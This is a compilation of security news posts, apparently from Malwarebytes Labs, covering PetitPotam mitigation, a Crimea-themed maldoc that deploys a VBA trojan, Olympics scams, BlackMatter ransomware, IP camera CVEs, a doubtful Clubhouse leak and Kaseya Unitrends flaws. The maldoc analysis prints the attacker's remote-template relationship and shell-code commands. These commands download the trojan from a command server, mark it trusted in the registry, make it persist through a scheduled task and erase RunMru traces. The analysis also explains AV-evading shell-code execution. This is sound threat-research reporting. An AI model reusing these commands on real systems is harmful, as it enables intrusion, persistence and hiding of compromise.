IT News

In a revision of KnowledgeBase article KB5005413, Microsoft has provided more elaborate mitigation instructions for the PetitPotam attacks that were disclosed a week ago.

PetitPotam is the name for an attack method using a bug that was found by a security researcher who also published a proof-of-concept (PoC) exploit code. The attack could force remote Windows systems to reveal password hashes that could then be easily cracked. Microsoft quickly sent out an advisory for system administrators to stop using the now deprecated Windows NT LAN Manager (NTLM) to thwart an attack.

PetitPotam

PetitPotam enables a threat actor to launch an NTLM relay attack on domain controllers. It does this by performing an NTLM relay attack that does not rely on the  Microsoft’s Print System Remote Protocol (MS-RPRN) API but instead uses the EfsRpcOpenFileRaw function of the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC) API. MS-EFSRPC is used for maintenance and management operations on encrypted data that is stored remotely and accessible over a network. The PetitPotam PoC takes the form of a manipulator-in-the-middle (MitM) attack against Microsoft’s NTLM authentication system. The targeted computer is forced to initiate an authentication procedure and share its authentication details via NTLM.

Pass the hash

As we saw when discussing the HiveNightmare zero-day, hashed passwords are useful to attackers. Windows NT LAN Manager (NTLM) is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. When the client requests access to a service associated with the domain, the service sends a challenge to the client, requiring the client to perform a mathematical operation using its authentication token, and then return the result of this operation to the service. The service may validate the result or send it to the Domain Controller (DC) for validation. If the service or DC confirm that the client’s response is correct, the service allows access to the client. Sounds secure, right? Well, the fun part is that with the hash you have enough information to perform that “mathematical operation” required to gain access. The authentication process does not require the plaintext password. The hash is enough.

So, pass the hash is the name for a technique that allows an attacker to authenticate to a remote server or service by using the hash of a user’s password, instead of requiring the associated plaintext password as is normally the case.

Hard to patch

Since the PetitPotam attack is not based on a vulnerability but uses a legitimate function in a way that was not intended, it will be hard to patch for this attack without “breaking stuff.” Further, stopping the Encrypting File System (EFS) service does not prevent the technique from being exploited.

Vulnerable systems

The Microsoft advisory lists these Microsoft Server Operating Systems: Windows Server 2008, Windows Server 2008 R2, Windows Server 2016, Windows Server 2019, and Windows Server 2022. It also states that companies are vulnerable to a PetitPotam attack if NTLM authentication is enabled in their domains and/or if they are using Active Directory Certificate Services (AD CS) with the services “Certificate Authority Web Enrollment” and “Certificate Enrollment Web Service.”

New mitigation details

Microsoft has divided the mitigation techniques into a Primary part and an Additional part.

Primary

On AD CS servers open the Internet Information Services (IIS) Manager and do the following:

• Enable Extended Protection for Authentication (EPA) for Certificate Authority Web Enrollment, “Required” being the more secure and recommended option.
• Enable EPA for Certificate Enrollment Web Service, “Required” being the more secure and recommended option. After enabling EPA in the UI, the Web.config file created by CES role at <%windir%>systemdataCES<CA Name>_CES_Kerberosweb.config should also be updated by adding <extendedProtectionPolicy> set with a value of either WhenSupported or Always depending on the Extended Protection option selected in the IIS UI.
• Enable Require SSL, which will enable only HTTPS connections.

Additional

Disable the deprecated NTLM authentication where possible.

• Disable NTLM Authentication on your Windows domain controller.
• Disable NTLM on any AD CS Servers in your domain using the group policy (GPO). To configure this GPO, open Group Policy and go to Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options and set Network security: Restrict NTLM: Incoming NTLM traffic to Deny All Accounts or Deny All domain accounts.  If needed, you can add exceptions as necessary.
• Disable NTLM for Internet Information Services (IIS) on AD CS Servers in your domain running the “Certificate Authority Web Enrollment” or “Certificate Enrollment Web Service” services.

Important note: After completing the above steps, you will need to restart IIS to load the changes. To restart IIS, open an elevated Command Prompt window, type the following command, and then press ENTER:

iisreset /restart

This command stops all IIS services that are running and then restarts them.

For full instructions including screenshots please look at the revised KB5005413.

The post Microsoft provides more mitigation instructions for the PetitPotam attack appeared first on Malwarebytes Labs.

This blog post was authored by Hossein Jazi.

On July 21, 2021, we identified a suspicious document named “Манифест.docx” (“Manifest.docx”) that downloads and executes two templates: one is macro-enabled and the other is an html object that contains an Internet Explorer exploit.

While both techniques rely on template injection to drop a full-featured Remote Access Trojan, the IE exploit (CVE-2021-26411) previously used by the Lazarus APT is an unusual discovery. The attackers may have wanted to combine a social engineering technique with a known exploit to maximize their chances of infecting targets.

We also uncovered a panel used by the threat actors nicknamed “Ekipa” which could be translated to “team.” Victims are tracked and statistics include whether the IE exploit was successful or not.

We could not determine who might be behind this attack based on the techniques alone, but a decoy document displayed to victims may give some clues. It contains a statement from a group associating with Andrey Sergeevich Portyko and opposed to Putin’s policies on the Crimean peninsula.

Remote templates

By looking closer at the remote template embedded in settings.xml.rels we noticed that it contains a full featured VBA Rat that performs the following actions:

• Collects victim’s info
• Identifies the AV product running on a victim’s machine
• Executes shell-codes
• Deletes files
• Uploads and downloads files
• Reads disk and file systems information

The second template is embedded in Document.xml.rels and is loaded into the document. Looking at the loaded code we noticed that it contains an IE Exploit (CVE-2021-26411) that was once used by Lazarus APT to target security researchers working on vulnerability disclosure, as reported by the threat research teams at Google and Microsoft. The shell-code executed using this exploit deploys the same VBA Rat that was loaded using remote template injection.

After loading the remote templates the malicious document loads a decoy document in Russian which is pretty interesting. The decoy document is a statement from a group within Crimea that voices opposition to Russia and specifically Putin’s policies against that peninsula. In the following, you can see this statement in both Russian and English language.

Document Analysis

The malicious document (“Манифест.docx”) contains two templates in settings.xml.rels and document.xml.rels. The remote template that is located in settings.xml.rels downloads a macro weaponized template and loads it into current document. This remote template contains a macro code with full-featured Rat functionality. We provide the analysis of this VBA Rat in the next section.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="HtTpS:\cloud-documents.com/doc/t.php?action=show_content" TargetMode="External"/></Relationships>

The second template is embedded in document.xml.rels and will be loaded in an object in the main document. This template contains an exploit code for CVE-2021-26411.

This exploit code used by this remote template is almost similar to what has been reported by ENKI security firm.

The shell-code executed by this exploit deploys the same VBA Rat that is also loaded using the remote template embedded in settings.xml.rels. In fact, the actor tries to deploy its VBA Rat using two different methods.
The shell-code is very simple and performs the following actions. The shell-code is written in the AutoHotKey scripting language and all of its actions are executed using SendInput API call.

• Add VBA Rat as Trusted document to TrustedRecords registry key. By adding this Rat to this registry there won’t be any need to enable the macro when this document will be opened next time.
  reg add "HKCU\SOFTWARE\Microsoft\Office\16.0\Word\Security\Trusted Documents\TrustRecords" /V https://cloud-documents.com/doc/templates/agent.dotm /t REG_BINARY /d 00000000000000000040230e43000000f9d99c01ffffff7f /f"
• Get the VBA Rat using: Winword /w https://cloud-documents.com/doc/t.php?document_show=notica
• Make this VBA Rat persistence by creating a Scheduled task to execute it every minute:
  SCHTASKS /Create /SC MINUTE /MO 1 /TN "z" /TR winword.exe ' /q /w %appdata%MicrosoftWordStartup_.dotm
• Delete RunMru registry value to clear its track records.
  Reg delete HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMru f

VBA Rat analysis (Remote Template)

The remote template contains Document_Open and Document_Close which are activated upon opening and closing the document.

Document_Open:

The Document_open function checks if the active document has the docx extension and if that is the case it shows the hidden content (decoy content). Then, if the active document name is "_.dotm" (this is the case when the machine is already infected with this Rat), it calls "ConnectCP" function. The ConnectCP function is responsible for collecting victim’s info by calling the following functions as well as a value named "cve" in CustomDocumentProperties (this value is being set during the first execution of this document).

After collecting data, it converts it into a json format by using the JsonConvertor function. The collected data later is used by the SCI function to be sent to the server and receive commands.

• getUUID: Gets UUID by executing "SELECT * FROM Win32_ComputerSystemProduct"
• getOS: Gets OS type by executing "SELECT * FROM Win32_OperatingSystem"
• arch: Returns OS architecture
• getCPU: Gets CPU info by executing "SELECT * FROM Win32_Processor"
• getGPU: Gets GPU info by executing "SELECT * FROM Win32_VideoController"
• getRAM: Gets physical memory capacity by executing "SELECT * FROM Win32_PhysicalMemory"
• getStorage: Gets available hard drive space by executing "Select * from Win32_LogicalDisk Where DriveType = 3"
• getName: Gets computer name, user name and domain name
• getRole: Identify if the victim has admin role or not.

• getAV: Gets Anti-Virus product info including the AV name, AV status (enabled or disabled) and AV signature stature (outdated or actual). To get these info it executes "Select * from AntiVirusProduct" to get the list of active Anti Virus products and then calls DisplayName to get the AV name and then identify the AV status and AV signature status using the product state codes. As an example if the product state code is 266240, it means that the AV product is enabled and its signature is updated.

At the end, the ConnectCP function calls the StartTimer function to start the task execution procedure (ExecuteTasks function). This function creates a timer that calls the ExecuteTasks function every 10 minutes to execute the tasks received from the server.

If the active document name is not "_.dotm" (The machine has not been infected before with this VBA Rat), it calls a function named InstallFromExp after making sure it is not running within a Sandbox environment and its extension is dotm. The attacker checks the value of the following registry key and if the value is equal to one it won’t execute the InstallFromExp.

HKCUSoftwareMicrosoftOffice&Application.Version&ExcelSecurityVBAWarnings

The value one for this registry key means that all untrusted and trusted macros are allowed to run without any notification which usually is a default setting for sandbox environments to run macro embedded documents automatically.

InstallFromExp performs the basic initialization of this Rat which includes the following three actions:

• Sets the customDocumentProperties named "cve" to “2021-26411”.
• Makes itself persistence by adding itself to word startup directory with "_.dotm" name: APPDATAMicrosoftWordStartUp_.dotm
• Cleans up its track records by deleting RunMRU registry key
• Exits the program

Document_Close

This function also performs the installation of the Rat but by calling a different function: InstallFromMacro. Before calling the installation function it calls the same Sandbox function to make sure it is not running into a sandbox environment and then checks if the path of the attached template includes http to make sure it has an embedded remote template url.

InstallFromMacro performs initialization of the Rat which includes the following three actions:

• Opens the attached remote template as a document and extract the contents of the comments section of the BuiltInDocumentProperties and spilts it by “|”. If the OS is 32 bit it takes the first part of the the comments and puts it in skd variable and if the OS is 64 bit it takes the second part of the comments section and puts it into skd. The skd variable later is used as a parameter for AddTask function.
• Sets the customDocumentProperties named “cve” to “MACRO”.
• Make itself persistence by adding itself to word startup directory with “_.dotm” name: APPDATAMicrosoftWordStartUp_.dotm
• Calls AddTask function
• Cleans up its track records by deleting RunMRU registry key

AddTask (Shell-Code execution using EnumWindows)

This function base64 decodes the content from the skd variable that has been set in InstallFromMacro function and executes it using VirtualProtect and EnumWindows. In fact the content of the skd is a small shell-code that has been executed within the memory without being written into disk. The actor has used an interesting API call for ShellCode execution. Instead of using well known API calls for shell code execution which can easily get flagged by AV products such as VirtualAlloc, WriteProcessMemory, and CreateThread the actor has used EnumWindows to execute its shell-code.

The second argument of EnumWindows is an application-defined value to be passed to the callback function. By providing the address of the shell-code from VirtualProtect as second parameter to this function, it can execute the Shell-code.

The executed shell-code is very small and it just persists by creating a Scheduled task to execute it every minute:

SCHTASKS /Create /SC MINUTE /MO 1 /TN "z" /TR winword.exe ' /q /w %appdata%MicrosoftWordStartup_.dotm

Similar to the shell-code used in IE exploit, this shell-code is also written using AutoHotKey scripting language and it is using SendmessageA and SendInput to simulate keystrokes and perform its actions.

ExecuteTasks

This is the main function of this VBA Rat that receives the command from the server in Json format and then parses the json file and executes the command. Each time this function can execute three tasks. This has probably been set to avoid making noise in network activities which might be detected by security products.

To receive the tasks from the server this function receives one argument which is a function named SCI. SCI function sends the collected data by ConnectCP function in json format in a HTTP POST request and receives the response from the server which includes the tasks that need to be executed in JSON format.

Here is the list of commands that can be executed by this Rat. After executing each task the results of task execution will be sent to server.

ReadDisks

It gets each Drive information on the machine using Scripting.FileSystemObject.Drives object. It then creates a JSON object which includes the following key and values for each drive object:

• IsReady: this value sets to true if the drive is ready
• Label: gets name of the drive which will be either ShareName or VolumeName. This depends on whether the drive is remote or not
• Filesystem: gets the file system in use for the drive
• Freespace: gets the amount of free space for the drive in KB
• Name: gets the drive letter
• IsDirectory: This value is always True

ReadFileSystem

This function gets a Folder object corresponding to the folder in a specified path using Scripting.FileSystemObject.GetFolder object and then extracts it name, size, date last modified and puts them into a Json object. It also extracts the same information for all sub-folders and files in that Folder object and adds them to the Json object.

Download File

This function reads a specified file using Adobe.Recordset and sends the data to sever using HTTP POST request.

Upload File

This module receives a file from the server and writes it into specified file.

DeleteFile

This function uses Kill function to delete the specified file or directory.

Terminate

This function terminates the execution of the Rat and exits the application.

Execute

This function executes the received shell-code from the server using the same method used in AddTask function in which it has used VirtualProtect and EnumWindows to execute the shell-code.

ChangeTiming

This function resets the timer that is used to execute tasks every 10 minutes by calling EndTimer to kill the timer and then calling StartTimer to start a new timer.

Attacker panel

We were able to access to the panel used by the attacker. The panel’s main page includes the list of victims with some information about them including: IP address, date and time, NTLM, Windows version, Windows Architecture, Office version, Office architecture, IE version, Exploited (shows if the IE zero day was successful or not), Loader (shows if the VBA Rat successfully executed or not) and note.

The panel is written in PHP with a backed SQL database to store data. This install.php initializes the SQL database.

stats.php is the file that performs the main actions of this Rat that matches the functionalities we reported here. It also has some more functions including: delete_task, disable_task, enable_task, show_tasks, add_task, format_task and add_user.

Conclusion

In this blog post we have analyzed an attack in which threat actors have used two different methods to infect their victims. Both techniques have been loaded by malicious documents using the template injection technique. The first template contains a url to download a remote template that has an embedded full-featured VBA Rat. This Rat has several different capabilities including downloading, uploading and executing files. The second template is an exploit for CVE-2021-26411 which executes a shell-code to deploy the same VBA Rat. The VBA Rat is not obfuscated but still has used some interesting techniques for shell-code injection.

As the conflict between Russia and Ukraine over Crimea continues, cyber attacks have been increasing as well. The decoy document contains a manifesto that shows a possible motive (Crimea) and target (Russian and pro-Russian individuals) behind this attack. However, it could also have been used as a false flag.

IOCs

Maldocs:
03eb08a930bb464837ede77df6c66651d526bab1560e7e6e0e8466ab23856bac
0661fc4eb09e99ba4d8e28a2d5fae6bb243f6acc0289870f9414f9328721010a

Remote template:
fffe061643271155f29ae015bca89100dec6b4b655fe0580aa8c6aee53f34928

C2 server:
cloud-documents[.]com

The post Crimea “manifesto” deploys VBA Rat using double attack vectors appeared first on Malwarebytes Labs.

The 2020 Olympics are, after a bit of a delayed start, officially in full swing. So too is the possibility for scammers to crawl out of the woodwork. And while actual, measurable cyberrattacks and hacks surrounding The Olympics did not truly get rolling until 2008 in Beijing, The Olympic games have traditionally been quite the target for malicious acts of all kinds, dating back years. Shall we take a look?

1996 Atlanta

No sign of cyberattacks yet. A disaster is alluded to, but the disaster in question is down to slow websites for surfers, and faulty data transmission at the event itself. People getting up to mischief? Not so much.

2000 Sydney

You may (or may not!) remember Sydney being referred to as “The Internet Olympics”. It was also the first major Olympics event where organizers braced for hacking related impact. I recall quite a lot of articles at the time predicting all manner of doom and gloom scenarios. I’m sure Y2K bug fever didn’t help douse the fires of suspicion that things were about to go awry.

As it turns out, things did not go awry. A non-hacked games were enjoyed by all. Phew.

2002 Salt Lake City

By the time of the 2002 Olympics, experts responsible for locking down the winter event were in good spirits. Nothing happened at the 2000 games, and it seems nothing happened at any earlier events either. Once again, the primary concern outside security was reliability and hoping massively complex networks wouldn’t fall over during the games proper.

2004 Athens

The most interesting cyber story in the build up to the 2004 games was an infamous wiretapping incident in Athens. Some folks maintain there’s a strong possibility it was designed to grab all manner of calls from VIPs during the games. We’ll almost certainly never know for sure.

2006 Turin

This is spectacular (and you really should click, because it’s hard to put into words what is on view here). As you can see, things still aren’t really all that cyber in Olympics land. That’s about to change, however…

2008 Beijing

The Beijing Olympics are notable for what may be the first real slice of cyberattacks aimed at the games. Former Chief Executive of the British Olympic Association feared they’d been compromised. A number of sports-related organizations, including various National Olympic Commitees, the World Anti-Doping Agency, and the International Olympic Committee, were all targeted by “Operation Shady Rat,” according to McAfee. While unrelated organizations were also targeted over a five-year period, this definitely isn’t what anybody needs prior to an Olympic games.

An article from the time claims the “English language version” of the Olympics site was apparently compromised and redirected to some sort of loan company portal. However, there are so many official and unofficial sites from the time, it’s difficult to say what exactly that site is. Is it a fan site? A real portal? Did the article typo the URL? I’m not sure, and I can’t find it being mentioned anywhere else. We’re on less shaky ground with this tale of banner color alteration, in which it was claimed that color alterations made to a website were purposeful hacks meant to highlight human rights abuses.

There’s also an incredibly comprehensive run-down of hack-related happenings during the 2008 games here. In just two years, we’ve gone from “not much happening here, is there?” to “RED ALERT, THIS IS NOT A DRILL”. Fake ticket websites, bogus streams, websites belonging to athletes hacked, site defacements, and more.

Away from the official games content itself, people were targeted by other means. All of a sudden we have infectious email attachments, and compromised third-party sites serving up malware. Wherever you looked, there was a threat sprinting into view.

Hacking may have been slow off the blocks, but it was definitely an unofficial event by this point.

2010 Vancouver

I couldn’t really find much for the Vancouver Winter Olympics. The most interesting incident was probably a fake opening ceremonies website serving infections, via promotion from a bogus Twitter account. Not spectacular by any means, but one of the first examples of using Twitter as a jumping-off point for attacks during a major event.

2012 London

The London Olympics—the one where James Bond and the definitely real Queen jumped out of a helicopter—was a massive splash of malicious activity in internet terms.

By this point, security drills and planning were a major component of the games. I seem to recall reading about Canada doing extensive testing in the build-up to Vancouver, and simulated attacks detailed here were probably building on those efforts. According to that article, China was “subject to about 12 million online attacks per day” during the 2008 games. War-gaming and using “an in-house team of pretend hackers,” as they put it, makes a lot of sense.

Articles warning of dangers mainly focused on search engine poisoning (still a threat back in 2012), fake sites, streaming, and once again Twitter makes an appearance as “one to watch.” There’s also the occasional warning about dubious Wi-Fi hotspots.

In terms of actual attacks which took place, we see the rise of mobile as a way in for Olympics scams. Russian sites hosted Trojans claiming to be official 2012 game apps. Yes, games thrown into the mix alongside mobile. What a combo! Email spam promising free airline tickets to see the games is a timeless social media scam also repackaged for this sporting event. Here, you’d get nothing but survey scams.

Elsewhere, there were threats to power supplies made prior to the opening ceremony. There was also this frankly incredible tale of traffic lights, in which Vanity Fair reported that London manipulated its own traffic light system to change any red lights to green lights for officials who were scouting the city for the initial Olympic bidding process. We’ll save the best for last, and by best I do of course mean worst—an opening ceremony conspiracy theory claiming to foreshadow COVID-19. Because hey, why not.

2014 Sochi

The “You’re definitely going to be hacked in Russia” framing went into a bit of overdrive during the build up to these particular games. Indeed, that specific story regarding how easy it was to be compromised in Sochi drew a fair amount of heat.

Even much more reserved commentary pieces labelled it a “cyber war zone.” Which is interesting, because the real fireworks would arrive at later events.

2016 Rio de Janeiro

The Rio Olympics had their now traditional opening ceremony of “here come the scams.” We can see clear patterns developing over time as scammers dust off their tried and tested sporting fakeouts.

Fake tickets and lottery winnings start doing their thing. So, too, do fake ticket sites, TV promotions, and even something offering world champion status in the “amorous olympics”! Phishing and bogus domains remained a strong contender for taking the scammer gold medal, with ATM carding grabbing a runner-up spot.

Ransomware put in a less than sporting appearance, via a compromised federation website. The RIG exploit kit was also lying in wait for anyone searching for Rio cake instructions—as in the actual baked dessert—which I must admit, I didn’t see coming.

All things banking are considered a problem point in Brazil in terms of hacks and malware, so there were plenty of warnings for visitors surrounding that too. You’ll notice alongside the mainstay threats there are some new additions beginning to seep in. New techniques and tactics will continue to emerge as we move from event to event. We’ll finish off with 2016 by linking to Anonymous branded attempts to highlight the less entertaining activities happening off camera.

2018 Pyeongchang

A strong start for Team Cybercriminal as they deploy “Olympic Destroyer,” whose name is if nothing else incredibly accurate as a mission statement. After various threats down the years to interfere with the opening ceremony, the bad people finally get their wish and caused chaos.

We take a quick dip back into mobile land, as more bad apps roll into action. In this case, one app claimed to be a livestream application showing highlights. In reality, the app crashed a lot but displayed a tireless ability to pop adverts without fail.

We round this brief summary off with a worrying slice of alleged nation state attack. US officials claimed that Russian spies compromised multiple computers, and made it look as though North Korea was responsible.

Actually, no. We’ll end this summary with a bit of an epilogue to the games, some months after it had taken place. A very nasty attack there, in which Russian hackers were accused of leaking the private medical information of US Olympians Simone Biles and Venus and Serena Williams, in a reported attempt to downplay the severity of Russia’s involvement in an Olympic doping scandal.

2020 Tokyo

And now we come to the current games held in Japan. Things began early, with Twitter account compromises in February. Picking up where we left off last time, state-backed attacks from Russia were planned before the games were postponed due to the pandemic. We’ve now got the traditional alarms being sounded, but it remains to be seen where the big hits hammer home. There is evidence of malware bouncing around though, in the form of Wiper malware targeting Japanese computers.

What we can say is that law enforcement are also ringing the big “please be careful” bell. The FBI put out a warning a week ago, and sure enough, a small leak has already taken place.

People should ensure they’re running the latest version of their operating system, their security software is up to date, and think very carefully where offers, freebies, discounts, streaming, mobile apps, or too-good-to-be-true emails are concerned.

These are tried and tested methods for Olympics scammers, and they’re becoming very good at it. Let’s see if we can make them come in last place for a change.

The post The Olympics: a timeline of scams, hacks, and malware appeared first on Malwarebytes Labs.

There’s a new ransomware gang in town—and, frankly, we’re not at all surprised.

After DarkSide disappeared—coincidentally, immediately after Colonial Pipeline gave in to the group’s ransom demand of roughly $5M USD worth in Bitcoin—a new ransomware group who calls themselves BlackMatter surfaced on the dark web, kicking off their operations sometime this week.

Analysts from Recorded Future, the cybersecurity group who initially reported on the new ransomware group, said their researchers are currently investigating BlackMatter. Though it is a fairly new cybercriminal gang, its members could be considered professionals in Ransomware-as-a-service (RaaS) as, to quote from BlackMatter themselves, “The project has incorporated in itself the best features of DarkSide, REvil, and LockBit.”

The BlackMatter group has been spotted posting on Exploit and XSS, two known cybercrime forums in the dark web. They’re not advertising their ransomware, however; they are recruiting affiliates that are called “initial access brokers,” a term that cybergangs use to refer to fellow criminals who have access to hacked enterprise networks. According to BlackMatter’s ads, the ransomware group is seeking hacked access to “corporate networks” located in Australia, Canada, the UK, and the US.

The new ransomware gang made it clear that they will not be targeting certain organizations, almost as if to say that they are keenly aware of the danger that comes from pulling off internationally-recognized attacks which can lead—and have led—to sudden shutdowns and disappearances.

In their own leak site, BlackMatter claim not to attack companies belonging to the following six industries, with the caveat that if or when any companies in these industries do get hit, such victims should simply ask for a free decryption:

“* Hospitals.
* Critical infrastructure facilities (nuclear power plants, power plants, water treatment facilities).
* Oil and gas industry (pipelines, oil refineries).
* Defense industry.
* Non-profit companies.
* Government sector.”

At the moment, BlackMatter has not made any move to attack organizations yet. Perhaps it won’t be long now.

Malwarebytes Labs will keep an eye on BlackMatter and continue to report about it in the future, not forgetting that AvosLocker, another new ransomware variant that popped up roughly in late June or early July, is also currently looking for affiliates they can work with; and, last but not the least, Haron, a potential offshoot of Avaddon and Thanos ransomware operations.

The post BlackMatter, a new ransomware group, claims link to DarkSide, REvil appeared first on Malwarebytes Labs.

Researchers at RandoriSec have found serious vulnerabilities in the firmware provided by UDP Technology to Geutebrück and many other IP camera vendors. According to the researchers the firmware supplier UDP Technology fails to respond to their reports despite numerous mails and LinkedIn messages.

Because of this unwillingness of UDP Technology to respond, RandoriSec worked with Geutebrück, one of the camera vendors, to correct the 11 authenticated RCE vulnerabilities and a complete authentication bypass that they found in the firmware.

History lessons

RandoriSec had found vulnerabilities in previous versions of the UDP technology firmware and knew from that previous experience that they could expect to be stonewalled when they reported the new vulnerabilities. UDP Technology provides firmware for several IP camera manufacturers, like:

• Geutebruck
• Ganz
• Visualint
• Cap
• THRIVE Intelligence
• Sophus
• VCA
• TripCorps
• Sprinx Technologies
• Smartec
• Riva
• and the camera’s they sell under their own brand name.

CISA

The Cybersecurity & Infrastructure Security Agency issued an advisory about the two Geutebrück IP camera types that were confirmed to be vulnerable, the G-Cam E2 and G-Code.

The CISA advisory includes the CVE identifiers for the found vulnerabilities. Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).

CVE-2021-33543 Missing authentication: allows unauthenticated remote access to sensitive files due to default user authentication settings.

CVE-2021-33544 RCE: the affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33545 RCE: The affected product is vulnerable to a stack-based buffer overflow condition in the counter parameter which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33546 RCE: The affected product is vulnerable to a stack-based buffer overflow condition in the name parameter, which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33547 RCE: The affected product is vulnerable to a stack-based buffer overflow condition in the profile parameter which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33548 RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33549 RCE: The affected product is vulnerable to a stack-based buffer overflow condition in the action parameter, which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33550 RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33551 RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33552 RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33553 RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.

CVE-2021-33554 RCE: The affected product is vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.

Impact of the vulnerabilities

As you can imagine, the combination of unauthorized access to sensitive files combined with that many RCE vulnerabilities creates a treasure trove for attackers, and finding an attack method that works for you is trivial. And it should not come as a surprise that public exploits are available.

Even an attacker having access to your live-stream can be bad enough, but an attacker that has full control of your IP camera is even worse. And, what’s more, a combination of the unauthorized access and some of the RCE vulnerabilities can allow an attacker to achieve root on the IP cameras that are running on the vulnerable firmware.

Mitigation

For the mentioned Geutebrück cameras, a patch is available (Login required) and should be installed as soon as possible. Users are urgently recommended to update to firmware Version 1.12.14.7 or later. Geutebrück worked with RandoriSec to make sure their patch fixes the vulnerabilities.

For users of other IP cameras we can not do much more than to recommend to either disable/replace the cameras and certainly query the vendors to find out whether their cameras suffer from the same vulnerabilities.

As a general advice for users of IoT devices, you can follow these CISA recommendations:

• Change the default passwords of the cameras.
• Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the Internet.
• Locate control system networks and remote devices behind firewalls and isolate them from the business network.
• When remote access is required, use secure methods, such as virtual private networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

Vendors of the IP cameras running UDP Technology firmware are encouraged to ask some serious questions about the development of the firmware and why UDP Technology chooses not to work with security researchers in a way that benefits all the IP camera vendors instead of only the one working with the researchers. Geutebrück users know which types are vulnerable and can remedy the vulnerabilities by installing a patch. Users of the other brands are left guessing, from reading between the lines in the RandoriSec blogpost, we fear the worst.

For a complete technical analysis of how the researchers found the vulnerabilities, you are encouraged to read the RadoriSec blog about it.

The post UDP Technology IP Camera firmware vulnerabilities allow for attacker to achieve root appeared first on Malwarebytes Labs.

Before the work week ended last week Friday, a security researcher found a leak of what is claimed to be full phone numbers of users of Clubhouse, the new social media app everyone is talking about and just recently came out of beta.

Clubhouse is an audio-only social media platform where, unlike many popular social sites in the market, users can communicate with each other in voice chat rooms that can accomodate thousands of people. Think of it as Zoom without the video and text chat options. As it got exponentially popular during the pandemic, it was deemed as “the next big social network” following TikTok. And, as one Clubhouse user had put it, “It feels more personal, deeper, than other social media.”

HaveIBeenPwned-creator Troy Hunt, however, was quick to ask the important question before things get completely out of hand. After all, a compromise of 3.8 billion data—in this case, phone numbers—is not something you can easily dismiss.

Below is a partial extract of the text from off the screenshot of that Dark Web forum post:

Clubhouse (valued at over $3 billion USD) is the latest social network including the most influential people in the world.

COMPROMISED DATA:
3.8 billion phone numbers (including cellphones + fixed + private + professional numbers).

Clubhouse is connected in real time to all their users’ phonebooks meaning each time you add a new phone number in your phonebook, the number is automatically added into the secret database of Clubhouse. Each number is ranked by a score (the score corresponds to the number of Clubhouse users who have this specific phone number in their phonebook).

With this score we are able to evaluate the level of the network of each phone number in the world. We can do national and international ranking of each human and organization.

The partial extract. To be honest, the last sentence doesn’t even make sense.

Alon Gal, or @UnderTheBreach on Twitter, CTO of cybercrime intelligence firm Hudson Rock, gave an unabashed take about the hack.

If you’re wondering why we shouldn’t make a big deal out of this so-called breach, Gal further explains in the same Twitter thread:

Jane Manchun Wong, or @wongmjane on Twitter, a security and app researcher, had a similar take.

Many more chimed in, with some shedding light on the dark web forum post (“bad sample”) and on the poster itself (“This seller has a bad past”).

Every breach report, especially if it involves big names and/or big numbers, could drive anyone scrambling to get the full story, how it happened, how many were affected, and what should users do now. However, cybercriminals, being criminals, won’t think twice about using “The Breach angle” as a lure to score thousands of dollars from fellow data-hungry criminals.

As always, stay safe, and don’t believe every report of breach out there until it’s verified by an expert!

The post The Clubhouse database “breach” is likely a non-breach. Here’s why. appeared first on Malwarebytes Labs.

It must not be easy to work at Kaseya right now. While they are working as hard as they can to help customers, and customers of their customers, recover from the REvil ransomware attack at the beginning of July, a new vulnerability in their software has been disclosed.

As a sidenote, Kaseya specifically denies on their website that they did not pay the ransom ($70 million was the initial demand) to stop the critics saying they were encouraging additional ransomware attacks fed by rumors that the decryption key was obtained by paying the ransom.

In the meantime, security researchers warn of three new zero-day vulnerabilities in the Kaseya Unitrends service and advise users not to expose the service to the Internet.

Kaseya Unitrends

Kaseya offers remote monitoring and management solutions for Managed Service Providers (MSPs). MSPs are companies that facilitate the remote management of a business’s technology and network. A managed service provider will remotely manage a business’s network so the business owner doesn’t need to hire a full-time team of their own.

Unitrends is a Kaseya company and a provider of all-in-one enterprise backup and continuity solutions. It can serve as a cloud-based enterprise backup and disaster recovery solution that can be used as a stand-alone solution or as an add-on for the Kaseya VSA remote management platform.

DIVD warns again

As Victor Gevers indicated when he was a guest in our podcast about the Kaseya VSA incident, the Dutch Institute for Vulnerability Disclosure found seven or eight zero-days in the Kaseya software. In their Kaseya limited disclosure post from earlier this month you can find a list of 7 CVE identifiers.

But the DIVD opened a new case file for Kaseya Unitrends. The summary in that case file reveals that a DIVD researcher has identified several vulnerabilities in the Kaseya Unitrends backup product versions that are lower than 10.5.2. The recommendation to mitigate the risks posed by these vulnerabilities is to not expose this service or the clients directly to the internet until Kaseya has patched these vulnerabilities.

The DIVD is all about coordinated vulnerability disclosure. This is done because the full knowledge of the vulnerabilities might enable cybercriminals to leverage the vulnerability and do a lot of harm. Coordinated vulnerability disclosure lets the vendor know what exactly is wrong, but it also informs the users that are affected by the vulnerability what the mitigation instructions are.

